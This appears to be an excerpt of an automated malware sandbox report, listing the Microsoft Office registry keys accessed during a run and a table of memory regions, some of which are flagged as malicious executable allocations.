HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\SyncProc\Resiliency\StartupItems
8g9
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\SyncProc\Resiliency\StartupItems
9g9
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\FileIO
CacheMaintenanceGuid
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\FileIO
TimeCacheMaintenanceStart
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\FileIO
CacheMigrationAttempted
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\FileIO
FileCacheScanLastRunId
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\FileIO
FileCacheScanLastRun
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
AceFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109E60090400000000000F01FEC\Usage
AceFilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
WxpFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\SyncProc\Resiliency\StartupItems
sq2
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\SyncProc\Resiliency\StartupItems
tq2
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
There are 130 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
4A80000
direct allocation
page execute and read and write
malicious
47C0000
direct allocation
page execute and read and write
malicious
4990000
direct allocation
page execute and read and write
malicious
49B0000
direct allocation
page execute and read and write
malicious
4AA0000
direct allocation
page execute and read and write
malicious
4A50000
direct allocation
page execute and read and write
malicious
8B0000
system
page execute and read and write
malicious
8B0000
system
page execute and read and write
malicious
47F0000
direct allocation
page execute and read and write
malicious
4810000
direct allocation
page execute and read and write
malicious
12B0000
direct allocation
page execute and read and write
malicious
74A0000
trusted library allocation
page read and write
7C4000
heap
page read and write
7541000
heap
page read and write
7758000
trusted library allocation
page read and write
92C0000
trusted library allocation
page read and write
92C5000
trusted library allocation
page read and write
1DAEB258000
heap
page read and write
9340000
trusted library allocation
page read and write
AF10000
trusted library allocation
page read and write
8D0000
heap
page read and write
A1D0000
trusted library allocation
page read and write
D81000
unkown
page execute read
9355000
trusted library allocation
page read and write
83B0000
trusted library allocation
page read and write
9260000
trusted library allocation
page read and write
A108000
trusted library allocation
page read and write
9100000
trusted library allocation
page read and write
4FE0000
heap
page read and write
3056000
heap
page read and write
9460000
trusted library allocation
page read and write
92C0000
trusted library allocation
page read and write
8140000
trusted library allocation
page read and write
83C0000
trusted library allocation
page read and write
8900000
trusted library allocation
page read and write
9125000
unkown
page read and write
9120000
trusted library allocation
page read and write
C189000
trusted library allocation
page read and write
A120000
trusted library allocation
page read and write
8380000
trusted library allocation
page read and write
9360000
unkown
page read and write
92E7000
trusted library allocation
page read and write
8EA000
heap
page read and write
9120000
unkown
page read and write
2F78000
heap
page read and write
53EF000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
9408000
trusted library allocation
page read and write
7C4000
heap
page read and write
9260000
trusted library allocation
page read and write
A110000
trusted library allocation
page read and write
A110000
trusted library allocation
page read and write
7541000
heap
page read and write
91D0000
trusted library allocation
page read and write
2AD72240000
trusted library allocation
page read and write
7780000
trusted library allocation
page execute and read and write
9230000
trusted library allocation
page read and write
83C000
stack
page read and write
92A0000
trusted library allocation
page read and write
A0E0000
trusted library allocation
page read and write
569A000
heap
page read and write
912E000
trusted library allocation
page read and write
AFE0000
trusted library allocation
page read and write
9330000
trusted library allocation
page read and write
A0C0000
trusted library allocation
page read and write
9260000
trusted library allocation
page read and write
92C0000
trusted library allocation
page read and write
4FDC000
heap
page read and write
9360000
unkown
page read and write
2228A646000
heap
page read and write
92E0000
trusted library allocation
page read and write
9110000
trusted library allocation
page read and write
1DAEB160000
trusted library allocation
page read and write
83A0000
trusted library allocation
page read and write
BC50000
trusted library allocation
page read and write
96E0000
trusted library allocation
page read and write
4F50000
trusted library allocation
page read and write
9137000
trusted library allocation
page read and write
704F000
direct allocation
page read and write
9160000
trusted library allocation
page read and write
773000
heap
page read and write
92E0000
trusted library allocation
page read and write
27154800000
heap
page read and write
53F9000
stack
page read and write
2E3F8740000
heap
page read and write
2AD6C9E1000
trusted library allocation
page read and write
9630000
unkown
page read and write
9150000
trusted library allocation
page read and write
A110000
trusted library allocation
page read and write
1B4F5113000
heap
page read and write
9590000
trusted library allocation
page read and write
AF00000
trusted library allocation
page read and write
BA7397F000
stack
page read and write
9120000
trusted library allocation
page read and write
2AD72440000
remote allocation
page read and write
A100000
trusted library allocation
page read and write
8A0000
remote allocation
page read and write
5569000
trusted library allocation
page read and write
2BA5A481000
heap
page read and write
56EA000
heap
page read and write
A110000
trusted library allocation
page read and write
92C0000
unkown
page read and write
4F40000
trusted library allocation
page read and write
2AD6DF60000
trusted library allocation
page read and write
2BA5A44E000
heap
page read and write
AD30000
trusted library allocation
page read and write
2AD6C970000
trusted library allocation
page read and write
4C81000
trusted library allocation
page read and write
83A0000
trusted library allocation
page read and write
9600000
trusted library allocation
page read and write
AF10000
trusted library allocation
page read and write
96F0000
trusted library allocation
page read and write
8A0000
remote allocation
page read and write
2BA5A513000
heap
page read and write
2795FE5A000
heap
page read and write
2FA4000
heap
page read and write
9330000
trusted library allocation
page read and write
9460000
trusted library allocation
page read and write
9110000
trusted library allocation
page read and write
A1E0000
trusted library allocation
page read and write
9330000
trusted library allocation
page read and write
BCF1000
trusted library allocation
page read and write
4C8E000
trusted library allocation
page read and write
1B4F5102000
heap
page read and write
9600000
trusted library allocation
page read and write
AD47000
trusted library allocation
page read and write
50FD000
heap
page read and write
9120000
trusted library allocation
page read and write
5626000
trusted library allocation
page read and write
CD0000
heap
page read and write
9330000
trusted library allocation
page read and write
9260000
trusted library allocation
page read and write
4C50000
trusted library allocation
page read and write
4DF0000
trusted library allocation
page read and write
9138000
trusted library allocation
page read and write
9360000
trusted library allocation
page read and write
9100000
trusted library allocation
page read and write
6FF0000
direct allocation
page read and write
9318000
trusted library allocation
page read and write
7251000
trusted library allocation
page read and write
8E0000
remote allocation
page read and write
21D75654000
heap
page read and write
6B80000
direct allocation
page read and write
5572000
trusted library allocation
page read and write
9130000
trusted library allocation
page read and write
4DE0000
trusted library allocation
page read and write
7461000
direct allocation
page read and write
9630000
trusted library allocation
page read and write
1DAEB040000
heap
page read and write
96F5000
trusted library allocation
page read and write
2228A702000
heap
page read and write
9330000
trusted library allocation
page read and write
7380000
trusted library allocation
page read and write
4EF0000
trusted library allocation
page read and write
83C0000
trusted library allocation
page read and write
7470000
direct allocation
page read and write
A100000
trusted library allocation
page read and write
2795FE6E000
heap
page read and write
6AE2000
direct allocation
page read and write
2795FE00000
heap
page read and write
95D0000
trusted library allocation
page read and write
9110000
trusted library allocation
page read and write
2AD6D3F0000
trusted library allocation
page read and write
2715483E000
heap
page read and write
96A0000
trusted library allocation
page read and write
9420000
trusted library allocation
page read and write
9115000
trusted library allocation
page read and write
4D30000
trusted library allocation
page read and write
569A000
heap
page read and write
2AD72120000
trusted library allocation
page read and write
A4A000
heap
page read and write
9500000
unkown
page read and write
9440000
trusted library allocation
page read and write
4F50000
trusted library allocation
page read and write
9330000
trusted library allocation
page read and write
2AD720E8000
trusted library allocation
page read and write
8390000
unkown
page read and write
8110000
trusted library allocation
page read and write
4B54000
heap
page read and write
9110000
trusted library allocation
page read and write
558F000
heap
page read and write
D4E000
stack
page read and write
9310000
trusted library allocation
page read and write
E97000
unkown
page read and write
50DE000
stack
page read and write
8298000
trusted library allocation
page read and write
B110000
trusted library allocation
page read and write
95E0000
trusted library allocation
page read and write
92E0000
trusted library allocation
page read and write
7C4000
heap
page read and write
2BA5A360000
heap
page read and write
95C0000
trusted library allocation
page read and write
4F50000
trusted library allocation
page read and write
93F0000
trusted library allocation
page read and write
A100000
trusted library allocation
page read and write
9320000
trusted library allocation
page read and write
2AD6C8D0000
heap
page read and write
96E5000
trusted library allocation
page read and write
AF10000
trusted library allocation
page read and write
AF20000
trusted library allocation
page read and write
7750000
trusted library allocation
page read and write
7770000
trusted library allocation
page read and write
7290000
trusted library allocation
page read and write
9310000
trusted library allocation
page read and write
9290000
trusted library allocation
page read and write
95E9000
trusted library allocation
page read and write
95B0000
trusted library allocation
page read and write
2AD72420000
trusted library allocation
page read and write
1B4F5000000
heap
page read and write
2E3F9080000
remote allocation
page read and write
3590000
heap
page read and write
7541000
heap
page read and write
57C0000
heap
page read and write
544E000
stack
page read and write
9260000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
6FB0000
direct allocation
page read and write
5410000
remote allocation
page read and write
D1E2CFF000
stack
page read and write
92A0000
trusted library allocation
page read and write
AF30000
trusted library allocation
page read and write
95F0000
trusted library allocation
page read and write
83B0000
trusted library allocation
page read and write
8230000
trusted library allocation
page read and write
2E3F8902000
heap
page read and write
BCC7000
trusted library allocation
page read and write
A130000
trusted library allocation
page read and write
56FE000
heap
page read and write
4F9D000
stack
page read and write
96C0000
trusted library allocation
page read and write
9237000
trusted library allocation
page read and write
93E0000
trusted library allocation
page read and write
4F93000
heap
page read and write
73E0000
trusted library allocation
page read and write
9150000
trusted library allocation
page read and write
21DA9A02000
trusted library allocation
page read and write
8390000
trusted library allocation
page read and write
9170000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
83A0000
trusted library allocation
page read and write
27155202000
heap
page read and write
9110000
trusted library allocation
page read and write
913E000
trusted library allocation
page read and write
2BA5A470000
heap
page read and write
91F0000
trusted library allocation
page read and write
95F0000
trusted library allocation
page read and write
9620000
trusted library allocation
page read and write
A2F0000
trusted library allocation
page read and write
AF23000
trusted library allocation
page read and write
9AC000
stack
page read and write
54A0000
trusted library allocation
page read and write
1DAEAFE0000
heap
page read and write
8380000
trusted library allocation
page read and write
4FCB000
heap
page read and write
1DAEB283000
heap
page read and write
92E0000
trusted library allocation
page read and write
9310000
trusted library allocation
page read and write
560E000
stack
page read and write
2AD6CA7D000
heap
page read and write
9280000
trusted library allocation
page read and write
2AD6CA13000
heap
page read and write
95E0000
trusted library allocation
page execute and read and write
A0C44FE000
stack
page read and write
92F0000
trusted library allocation
page read and write
9400000
trusted library allocation
page read and write
A120000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
83E0000
unkown
page read and write
96F0000
trusted library allocation
page read and write
946F000
trusted library allocation
page read and write
94B0000
trusted library allocation
page read and write
6B00000
direct allocation
page read and write
7020000
trusted library allocation
page read and write
9260000
trusted library allocation
page read and write
AEF0000
trusted library allocation
page read and write
91F0000
trusted library allocation
page read and write
5636000
trusted library allocation
page read and write
2AD6CB14000
heap
page read and write
8380000
trusted library allocation
page read and write
811C000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
3349000
heap
page read and write
AEF0000
trusted library allocation
page read and write
91E0000
trusted library allocation
page read and write
9126000
trusted library allocation
page read and write
96A0000
trusted library allocation
page read and write
A1E0000
trusted library allocation
page read and write
9100000
unkown
page read and write
8390000
trusted library allocation
page read and write
4FE0000
heap
page read and write
9460000
trusted library allocation
page read and write
92E0000
trusted library allocation
page read and write
9115000
trusted library allocation
page read and write
9410000
trusted library allocation
page read and write
9450000
trusted library allocation
page read and write
854000
heap
page read and write
935F000
trusted library allocation
page read and write
83E0000
trusted library allocation
page read and write
96F0000
trusted library allocation
page read and write
92E0000
trusted library allocation
page read and write
7010000
direct allocation
page read and write
7744000
trusted library allocation
page read and write
56DA000
heap
page read and write
2228A3B0000
heap
page read and write
9460000
trusted library allocation
page read and write
8390000
trusted library allocation
page read and write
35F4000
heap
page read and write
5650000
trusted library allocation
page read and write
4F40000
trusted library allocation
page read and write
A0C0000
trusted library allocation
page read and write
8390000
trusted library allocation
page read and write
1DAEB300000
heap
page read and write
271548C6000
heap
page read and write
9330000
trusted library allocation
page read and write
BD20000
trusted library allocation
page read and write
AF50000
trusted library allocation
page read and write
9330000
trusted library allocation
page read and write
92A0000
trusted library allocation
page read and write
AEF0000
trusted library allocation
page read and write
A5DE000
stack
page read and write
9260000
trusted library allocation
page read and write
92A0000
trusted library allocation
page read and write
9597000
trusted library allocation
page read and write
62897C000
stack
page read and write
9350000
trusted library allocation
page read and write
9683000
trusted library allocation
page read and write
7541000
heap
page read and write
9400000
trusted library allocation
page read and write
9100000
trusted library allocation
page read and write
2795FF08000
heap
page read and write
2AD6CA29000
heap
page read and write
96C0000
trusted library allocation
page read and write
9450000
trusted library allocation
page read and write
C70000
trusted library allocation
page read and write
1DAEB1D0000
remote allocation
page read and write
49F0000
trusted library allocation
page read and write
92A0000
trusted library allocation
page read and write
83E0000
unkown
page read and write
4C81000
trusted library allocation
page read and write
AFC0000
trusted library allocation
page read and write
96E0000
trusted library allocation
page read and write
9490000
trusted library allocation
page read and write
96F0000
trusted library allocation
page read and write
94B3000
trusted library allocation
page read and write
7130000
trusted library allocation
page read and write
95D0000
trusted library allocation
page read and write
9130000
trusted library allocation
page read and write
2E3F87E0000
trusted library allocation
page read and write
9100000
unkown
page read and write
4AB7000
heap
page read and write
FB8B87E000
stack
page read and write
2AD6CABE000
heap
page read and write
8A0000
remote allocation
page read and write
1150000
trusted library allocation
page read and write
96C0000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
8390000
trusted library allocation
page read and write
1E1852C0000
heap
page read and write
94B1000
trusted library allocation
page read and write
A140000
trusted library allocation
page read and write
A2F0000
trusted library allocation
page read and write
95E0000
trusted library allocation
page read and write
8130000
trusted library allocation
page read and write
9100000
trusted library allocation
page read and write
AF41000
trusted library allocation
page read and write
7541000
heap
page read and write
AEF0000
trusted library allocation
page read and write
87C000
stack
page read and write
9410000
trusted library allocation
page read and write
9700000
trusted library allocation
page read and write
4DA0000
trusted library section
page read and write
854000
heap
page read and write
A1D0000
trusted library allocation
page read and write
96F0000
trusted library allocation
page read and write
83A0000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
4F54000
trusted library allocation
page read and write
5BB1000
direct allocation
page read and write
21DA8F80000
trusted library allocation
page read and write
A140000
trusted library allocation
page read and write
8210000
trusted library allocation
page read and write
C60000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
57C4000
heap
page read and write
A140000
trusted library allocation
page read and write
9290000
trusted library allocation
page read and write
2AD72440000
remote allocation
page read and write
56F5000
heap
page read and write
4F50000
trusted library allocation
page read and write
AF20000
trusted library allocation
page read and write
4F8E000
heap
page read and write
11A187C000
stack
page read and write
8390000
trusted library allocation
page read and write
83E5000
trusted library allocation
page read and write
5714000
heap
page read and write
73C0000
trusted library allocation
page read and write
93A0000
trusted library allocation
page read and write
9100000
trusted library allocation
page read and write
EF0000
heap
page read and write
9110000
trusted library allocation
page read and write
A0E0000
trusted library allocation
page read and write
96C0000
trusted library allocation
page read and write
4FC9000
heap
page read and write
92E0000
trusted library allocation
page read and write
4F40000
trusted library allocation
page read and write
9160000
trusted library allocation
page read and write
92A0000
trusted library allocation
page read and write
9290000
trusted library allocation
page read and write
2228A66B000
heap
page read and write
9100000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
A70000
heap
page read and write
2AD72230000
trusted library allocation
page read and write
2AD72530000
trusted library allocation
page read and write
92C0000
trusted library allocation
page read and write
92C0000
trusted library allocation
page read and write
A140000
trusted library allocation
page read and write
92C5000
trusted library allocation
page read and write
9AF000
stack
page read and write
9700000
trusted library allocation
page read and write
510D000
stack
page read and write
7170000
trusted library allocation
page read and write
94F0000
unkown
page read and write
5C40000
direct allocation
page read and write
8130000
trusted library allocation
page read and write
83A0000
trusted library allocation
page read and write
B0C0000
trusted library allocation
page read and write
7541000
heap
page read and write
271547D0000
trusted library allocation
page read and write
96E0000
trusted library allocation
page read and write
9600000
trusted library allocation
page read and write
9730000
trusted library allocation
page read and write
9470000
unkown
page read and write
E1B32FB000
stack
page read and write
9450000
trusted library allocation
page read and write
9331000
trusted library allocation
page read and write
5100000
heap
page read and write
594C000
trusted library allocation
page read and write
1DAEB1D0000
remote allocation
page read and write
DF54FFD000
stack
page read and write
307F000
stack
page read and write
7541000
heap
page read and write
7140000
trusted library allocation
page read and write
9350000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
FE2000
unkown
page read and write
83A0000
trusted library allocation
page read and write
1DAEB302000
heap
page read and write
8394000
trusted library allocation
page read and write
56DC000
heap
page read and write
95A0000
trusted library allocation
page read and write
704F000
direct allocation
page read and write
9320000
trusted library allocation
page read and write
54BF000
trusted library allocation
page read and write
A100000
trusted library allocation
page read and write
C40000
trusted library allocation
page read and write
9310000
trusted library allocation
page read and write
A140000
trusted library allocation
page read and write
8A0000
remote allocation
page read and write
DF54DF7000
stack
page read and write
2AD6D518000
heap
page read and write
92F0000
trusted library allocation
page read and write
AF27000
trusted library allocation
page read and write
9150000
trusted library allocation
page read and write
83A0000
trusted library allocation
page read and write
7541000
heap
page read and write
56F3000
heap
page read and write
2AD72110000
trusted library allocation
page read and write
9110000
trusted library allocation
page read and write
50CF000
heap
page read and write
550000
remote allocation
page read and write
5129000
heap
page read and write
9450000
trusted library allocation
page read and write
84E2E7E000
stack
page read and write
7541000
heap
page read and write
7260000
trusted library allocation
page read and write
A0C0000
trusted library allocation
page read and write
2228A3A0000
heap
page read and write
9110000
trusted library allocation
page read and write
95E0000
trusted library allocation
page read and write
2228AE02000
trusted library allocation
page read and write
4A7F000
heap
page read and write
9119000
trusted library allocation
page read and write
4FDA000
heap
page read and write
562E000
trusted library allocation
page read and write
9440000
trusted library allocation
page read and write
AF10000
trusted library allocation
page read and write
553E000
trusted library allocation
page read and write
2795FDE0000
heap
page read and write
A0E0000
trusted library allocation
page read and write
2228A510000
trusted library allocation
page read and write
9330000
trusted library allocation
page read and write
92C4000
trusted library allocation
page read and write
9330000
trusted library allocation
page read and write
83E0000
unkown
page read and write
9300000
trusted library allocation
page read and write
92C0000
trusted library allocation
page read and write
9290000
trusted library allocation
page read and write
7541000
heap
page read and write
AF00000
trusted library allocation
page read and write
1DAEAFD0000
heap
page read and write
56DD000
heap
page read and write
21D75700000
heap
page read and write
3310000
heap
page read and write
1E18543B000
heap
page read and write
92C0000
trusted library allocation
page read and write
96F4000
trusted library allocation
page read and write
4FB0000
trusted library allocation
page read and write
C60000
trusted library allocation
page read and write
52B0000
trusted library allocation
page read and write
92C0000
trusted library allocation
page read and write
56C3000
heap
page read and write
83B0000
trusted library allocation
page read and write
511A000
heap
page read and write
1B4F5077000
heap
page read and write
27154730000
heap
page read and write
9300000
trusted library allocation
page read and write
7160000
trusted library allocation
page read and write
92A0000
trusted library allocation
page read and write
628F7D000
stack
page read and write
4FA7000
heap
page read and write
1DAEB318000
heap
page read and write
83E0000
unkown
page read and write
4FED000
heap
page read and write
2795FE3C000
heap
page read and write
9350000
unkown
page read and write
56D8000
heap
page read and write
21DA9102000
heap
page read and write
5FE1000
trusted library allocation
page read and write
95B0000
trusted library allocation
page read and write
96B0000
trusted library allocation
page read and write
83A0000
trusted library allocation
page read and write
2795FE64000
heap
page read and write
FB8B5FD000
stack
page read and write
518000
stack
page read and write
92C0000
trusted library allocation
page read and write
95C0000
trusted library allocation
page read and write
83E0000
trusted library allocation
page read and write
83B0000
trusted library allocation
page read and write
96F7000
trusted library allocation
page read and write
9110000
trusted library allocation
page read and write
2AD6D513000
heap
page read and write
91D0000
unkown
page read and write
92A5000
unkown
page read and write
5120000
heap
page read and write
9450000
trusted library allocation
page read and write
A1E0000
trusted library allocation
page read and write
92D0000
trusted library allocation
page read and write
2795FD70000
heap
page read and write
9106000
trusted library allocation
page read and write
96F0000
trusted library allocation
page read and write
9130000
trusted library allocation
page read and write
AFC0000
trusted library allocation
page read and write
9440000
trusted library allocation
page execute and read and write
9330000
trusted library allocation
page read and write
AF00000
trusted library allocation
page read and write
AF00000
trusted library allocation
page read and write
9105000
trusted library allocation
page read and write
8395000
unkown
page read and write
9410000
trusted library allocation
page read and write
60D1000
heap
page read and write
5510000
heap
page read and write
9100000
trusted library allocation
page read and write
9350000
trusted library allocation
page read and write
9260000
trusted library allocation
page read and write
5944000
trusted library allocation
page read and write
5706000
heap
page read and write
2AD72263000
heap
page read and write
4C86000
trusted library allocation
page read and write
35F4000
heap
page read and write
9300000
trusted library allocation
page read and write
A1D0000
trusted library allocation
page read and write
9400000
trusted library allocation
page read and write
7080000
trusted library allocation
page read and write
4F40000
trusted library allocation
page read and write
9430000
trusted library allocation
page read and write
71A0000
trusted library allocation
page read and write
960000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
31A7000
stack
page read and write
A1F0000
trusted library allocation
page execute and read and write
A100000
trusted library allocation
page read and write
F89000
heap
page read and write
9680000
trusted library allocation
page read and write
4DC0000
trusted library allocation
page read and write
3036000
heap
page read and write
9350000
trusted library allocation
page read and write
2AD72100000
trusted library allocation
page read and write
9110000
unkown
page read and write
CC0000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
D1E2BF9000
stack
page read and write
27155300000
heap
page read and write
83D0000
trusted library allocation
page read and write
A120000
trusted library allocation
page read and write
7130000
trusted library allocation
page read and write
83A0000
trusted library allocation
page read and write
8390000
unkown
page read and write
C26A000
trusted library allocation
page read and write
8390000
trusted library allocation
page read and write
8389000
trusted library allocation
page read and write
AF00000
trusted library allocation
page read and write
8130000
trusted library allocation
page read and write
BC68000
trusted library allocation
page read and write
4E9E000
stack
page read and write
96C0000
trusted library allocation
page read and write
56DC000
heap
page read and write
A32E000
stack
page read and write
9120000
trusted library allocation
page read and write
2AD6CA91000
heap
page read and write
27154872000
heap
page read and write
9125000
trusted library allocation
page read and write
9460000
trusted library allocation
page read and write
BA7387E000
stack
page read and write
92C0000
trusted library allocation
page read and write
AF10000
trusted library allocation
page read and write
F28000
heap
page read and write
5128000
heap
page read and write
5908000
trusted library allocation
page read and write
95E5000
trusted library allocation
page read and write
2AD722FA000
heap
page read and write
9700000
trusted library allocation
page read and write
92F0000
trusted library allocation
page read and write
4EC0000
trusted library section
page read and write
A2F0000
trusted library allocation
page read and write
2228A654000
heap
page read and write
84E2BFB000
stack
page read and write
9500000
unkown
page read and write
A1D0000
trusted library allocation
page read and write
92E0000
trusted library allocation
page read and write
9150000
unkown
page read and write
854000
heap
page read and write
4EC0000
trusted library allocation
page read and write
93F0000
trusted library allocation
page read and write
94A0000
trusted library allocation
page read and write
93F3000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
96CD000
trusted library allocation
page read and write
71E0000
trusted library allocation
page read and write
9598000
unkown
page read and write
8110000
trusted library allocation
page read and write
569A000
heap
page read and write
1E185449000
heap
page read and write
9450000
trusted library allocation
page read and write
5131000
trusted library allocation
page read and write
4FBD000
heap
page read and write
7541000
heap
page read and write
5714000
heap
page read and write
2AD6CB02000
heap
page read and write
4A8F000
heap
page read and write
8380000
unkown
page read and write
73E0000
trusted library allocation
page read and write
B000000
trusted library allocation
page read and write
73D0000
unkown
page read and write
9260000
trusted library allocation
page read and write
4C86000
trusted library allocation
page read and write
94D000
stack
page read and write
83A0000
trusted library allocation
page read and write
A0E0000
trusted library allocation
page read and write
A1D0000
trusted library allocation
page read and write
9700000
trusted library allocation
page read and write
5420000
trusted library allocation
page read and write
92D0000
trusted library allocation
page read and write
1DAEB190000
trusted library allocation
page read and write
5113000
heap
page read and write
7FC20000
trusted library allocation
page execute and read and write
9120000
trusted library allocation
page read and write
7170000
trusted library allocation
page read and write
21DA9060000
heap
page read and write
A120000
trusted library allocation
page read and write
A0E0000
trusted library allocation
page read and write
83E0000
trusted library allocation
page read and write
6BA0000
direct allocation
page read and write
9160000
trusted library allocation
page read and write
9600000
trusted library allocation
page read and write
9116000
unkown
page read and write
9310000
trusted library allocation
page read and write
7541000
heap
page read and write
96C0000
trusted library allocation
page read and write
94DF000
trusted library allocation
page read and write
B120000
trusted library allocation
page read and write
A140000
trusted library allocation
page read and write
A1D0000
trusted library allocation
page read and write
9110000
trusted library allocation
page read and write
8390000
trusted library allocation
page read and write
56EA000
heap
page read and write
7240000
trusted library allocation
page read and write
9330000
trusted library allocation
page read and write
920000
heap
page read and write
9390000
trusted library allocation
page read and write
9160000
trusted library allocation
page read and write
95C0000
trusted library allocation
page read and write
9450000
trusted library allocation
page read and write
4A7F000
stack
page read and write
ACF0000
trusted library allocation
page read and write
AF2C000
trusted library allocation
page read and write
9120000
trusted library allocation
page read and write
DF54EFE000
stack
page read and write
942E000
trusted library allocation
page read and write
95C5000
trusted library allocation
page read and write
AF40000
trusted library allocation
page read and write
96A0000
trusted library allocation
page read and write
9100000
unkown
page read and write
71C0000
trusted library allocation
page read and write
35A0000
heap
page read and write
5105000
heap
page read and write
7F0000
remote allocation
page read and write
4AFD000
stack
page read and write
95C0000
unkown
page read and write
11A1CFC000
stack
page read and write
4F81000
heap
page read and write
1B4F4EC0000
heap
page read and write
92E0000
trusted library allocation
page read and write
92D0000
trusted library allocation
page read and write
9440000
trusted library allocation
page read and write
5410000
remote allocation
page read and write
8390000
unkown
page read and write
9260000
trusted library allocation
page read and write
4FE5000
heap
page read and write
C40000
trusted library allocation
page read and write
ACF0000
trusted library allocation
page read and write
9320000
trusted library allocation
page read and write
1053000
heap
page read and write
91E0000
unkown
page read and write
8380000
unkown
page read and write
92C0000
trusted library allocation
page read and write
9260000
trusted library allocation
page execute and read and write
96C0000
trusted library allocation
page read and write
73E0000
trusted library allocation
page read and write
9220000
trusted library allocation
page read and write
D1E2AFA000
stack
page read and write
4F58000
heap
page read and write
92C0000
trusted library allocation
page read and write
2AD6D400000
heap
page read and write
9120000
unkown
page read and write
5616000
trusted library allocation
page read and write
BA7377F000
stack
page read and write
96C0000
trusted library allocation
page read and write
9300000
trusted library allocation
page read and write
BCD3000
trusted library allocation
page read and write
2228A67B000
heap
page read and write
4DCD000
trusted library allocation
page execute and read and write
96D0000
trusted library allocation
page read and write
9600000
trusted library allocation
page read and write
F78000
heap
page read and write
4ED0000
trusted library allocation
page read and write
21DA9062000
heap
page read and write
4F83000
heap
page read and write
9290000
trusted library allocation
page read and write
92E0000
trusted library allocation
page read and write
5103000
heap
page read and write
50F6000
heap
page read and write
9367000
unkown
page read and write
4F6D000
heap
page read and write
92C0000
trusted library allocation
page read and write
A9E000
stack
page read and write
9410000
trusted library allocation
page read and write
7260000
trusted library allocation
page execute and read and write
9360000
unkown
page read and write
8393000
trusted library allocation
page read and write
9400000
trusted library allocation
page read and write
9330000
trusted library allocation
page execute and read and write
5210000
trusted library allocation
page read and write
83F0000
trusted library allocation
page read and write
D0E000
stack
page read and write
92D0000
trusted library allocation
page read and write
7541000
heap
page read and write
9410000
trusted library allocation
page read and write
A0BA000
stack
page read and write
9230000
trusted library allocation
page read and write
83E0000
trusted library allocation
page read and write
56D7000
heap
page read and write
2FB1000
heap
page read and write
96F0000
trusted library allocation
page read and write
96F0000
trusted library allocation
page read and write
9200000
unkown
page read and write
96C0000
trusted library allocation
page read and write
95E0000
trusted library allocation
page read and write
7044000
direct allocation
page read and write
11B0000
heap
page read and write
76FE000
stack
page read and write
96F0000
trusted library allocation
page read and write
35F4000
heap
page read and write
A100000
trusted library allocation
page read and write
73D0000
trusted library allocation
page read and write
9635000
unkown
page read and write
FB8B77C000
stack
page read and write
A0F0000
trusted library allocation
page read and write
9390000
trusted library allocation
page read and write
9690000
trusted library allocation
page read and write
B20000
heap
page read and write
2AD72550000
trusted library allocation
page read and write
9320000
trusted library allocation
page read and write
749C000
direct allocation
page read and write
9160000
trusted library allocation
page read and write
